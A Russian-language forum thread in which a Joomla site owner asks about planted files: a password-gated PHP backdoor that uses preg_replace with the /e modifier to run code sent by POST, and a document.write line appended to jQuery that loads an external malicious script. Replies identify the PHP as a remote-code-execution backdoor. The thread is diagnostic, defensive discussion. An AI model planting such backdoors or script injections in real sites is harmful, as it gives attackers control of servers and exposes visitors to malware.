Форум программистов, компьютерный форум, киберфорум
PHP
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.63/8: Рейтинг темы: голосов - 8, средняя оценка - 4.63
217 / 157 / 30
Регистрация: 11.05.2010
Сообщений: 614

preg_replace() и $_POST, есть ли тут дыра в безопасности?

24.12.2013, 12:19. Показов 1587. Ответов 2
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Вот о чём речь:
В некоторых местах на хостинге появились файлы с содержимым:
PHP
1
2
3
4
<?php
if (md5($_POST['p']) == '227632b72cb3d5d1b86d25ab190c0a88') {
    preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
Также к ним время от времени идёт обращение извне злоумышленником.

Кроме того, регулярно появляются в js библиотеках(типа jquery) в конце запись, типа такой:
JavaScript
1
;document.write("<scr"+"ipt src='mysite.com/[some_address]/[some_file].js'><"+"/script>");
Ну и, понятное дело, из-за этого [some_file].js меня блочит яндекс. (Troj/JSRedir-MN)

Вопрос в том, что же такого страшного написано в php-файле и может ли это быть связано с проблемой с js?

(что такое preg_replace я вкурсе, но вот почему он тут не пойму)
PHP 5.3
сайт на Joomla!1.5
0
Programming
Эксперт
39485 / 9562 / 3019
Регистрация: 12.04.2006
Сообщений: 41,671
Блог
24.12.2013, 12:19
Ответы с готовыми решениями:

Есть ли тут такие, у кого есть свои идеи ,касающиеся компьютерной безопасности,например, по защите от вирусов?
Есть ли тут такие, у кого есть свои идеи ,касающиеся компьютерной безопасности,например, по защите от вирусов?

Может какая-то дыра в безопасности?
Сервер на Debian, похоже, подцепил какую-то бяку, она заразила сайт на этом сервере. Подписывает в php файлы, сгенерированные...

Даны натуральные числа n, k. Проверить, есть ли в записи числа nk цифра m. тут число n в степени k, то есть k
Даны натуральные числа n, k. Проверить, есть ли в записи числа nk цифра m. Надо оформить данный код в HTML документ. var n =...

2
 Аватар для Vovan-VE
13210 / 6599 / 1041
Регистрация: 10.01.2008
Сообщений: 15,069
24.12.2013, 14:52
Вторая строка кода — проверка пароля, который был отправлен в POST[p].
Третья строка — это по существу скрытый eval(POST[v2]).

Это бекдор, позволяющий выполнить любой код.
1
217 / 157 / 30
Регистрация: 11.05.2010
Сообщений: 614
24.12.2013, 17:31  [ТС]
Цитата Сообщение от Vovan-VE Посмотреть сообщение
Третья строка — это по существу скрытый eval(POST[v2]).
А вот тут поподробнее, пожалуйста.
Уже не первый раз встречаю "нехороший код" с preg_replace(), но не совсем понимаю, каким образом он превращается в eval.

Добавлено через 23 минуты
Всё, понял/нашел. Всё дело в "/e" в конце.
Кому интересно, "небезопасные" функции в php.
2
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
inter-admin
Эксперт
29715 / 6470 / 2152
Регистрация: 06.03.2009
Сообщений: 28,500
Блог
24.12.2013, 17:31
Помогаю со студенческими работами здесь

Есть ли тут UB ?
Добрый день, не могу разобрать вот такую ситуацию: #include &lt;iostream&gt; using namespace std; class A { public: A()...

Есть ли тут CMS
Задачи изменить тексты на сайте www.negruta.md. Заказчик не знает ничего о разработке и я тоже. По БД вроде стоит какая то CMS Так как...

Есть ли тут живность?
Здравствуйте. Пока проблем с компьютером (другим) нет, но хотелось бы сделать аварийный образ системы (полный). Ну конечно хочется...

Тут есть Ошибка?
using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace ConsoleApplication1 { ...

Есть тут радиолюбители ?
Народ, помогите мне, объясните простым языком что это и как оно работает. 1 RS-триггеры 2 регистр 3 ПЗУ 4 мультивибратор ...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
3
Ответ Создать тему
Новые блоги и статьи
SDL3 для Web (WebAssembly): Работа со звуком через SDL3_mixer
8Observer8 08.02.2026
Содержание блога Пошагово создадим проект для загрузки звукового файла и воспроизведения звука с помощью библиотеки SDL3_mixer. Звук будет воспроизводиться по клику мышки по холсту на Desktop и по. . .
SDL3 для Web (WebAssembly): Основы отладки веб-приложений на SDL3 по USB и Wi-Fi, запущенных в браузере мобильных устройств
8Observer8 07.02.2026
Содержание блога Браузер Chrome имеет средства для отладки мобильных веб-приложений по USB. В этой пошаговой инструкции ограничимся работой с консолью. Вывод в консоль - это часть процесса. . .
SDL3 для Web (WebAssembly): Обработчик клика мыши в браузере ПК и касания экрана в браузере на мобильном устройстве
8Observer8 02.02.2026
Содержание блога Для начала пошагово создадим рабочий пример для подготовки к экспериментам в браузере ПК и в браузере мобильного устройства. Потом напишем обработчик клика мыши и обработчик. . .
Философия технологии
iceja 01.02.2026
На мой взгляд у человека в технических проектах остается роль генерального директора. Все остальное нейронки делают уже лучше человека. Они не могут нести предпринимательские риски, не могут. . .
SDL3 для Web (WebAssembly): Вывод текста со шрифтом TTF с помощью SDL3_ttf
8Observer8 01.02.2026
Содержание блога В этой пошаговой инструкции создадим с нуля веб-приложение, которое выводит текст в окне браузера. Запустим на Android на локальном сервере. Загрузим Release на бесплатный. . .
SDL3 для Web (WebAssembly): Сборка C/C++ проекта из консоли
8Observer8 30.01.2026
Содержание блога Если вы откроете примеры для начинающих на официальном репозитории SDL3 в папке: examples, то вы увидите, что все примеры используют следующие четыре обязательные функции, а. . .
SDL3 для Web (WebAssembly): Установка Emscripten SDK (emsdk) и CMake для сборки C и C++ приложений в Wasm
8Observer8 30.01.2026
Содержание блога Для того чтобы скачать Emscripten SDK (emsdk) необходимо сначало скачать и уставить Git: Install for Windows. Следуйте стандартной процедуре установки Git через установщик. . . .
SDL3 для Android: Подключение Box2D v3, физика и отрисовка коллайдеров
8Observer8 29.01.2026
Содержание блога Box2D - это библиотека для 2D физики для анимаций и игр. С её помощью можно определять были ли коллизии между конкретными объектами. Версия v3 была полностью переписана на Си, в. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru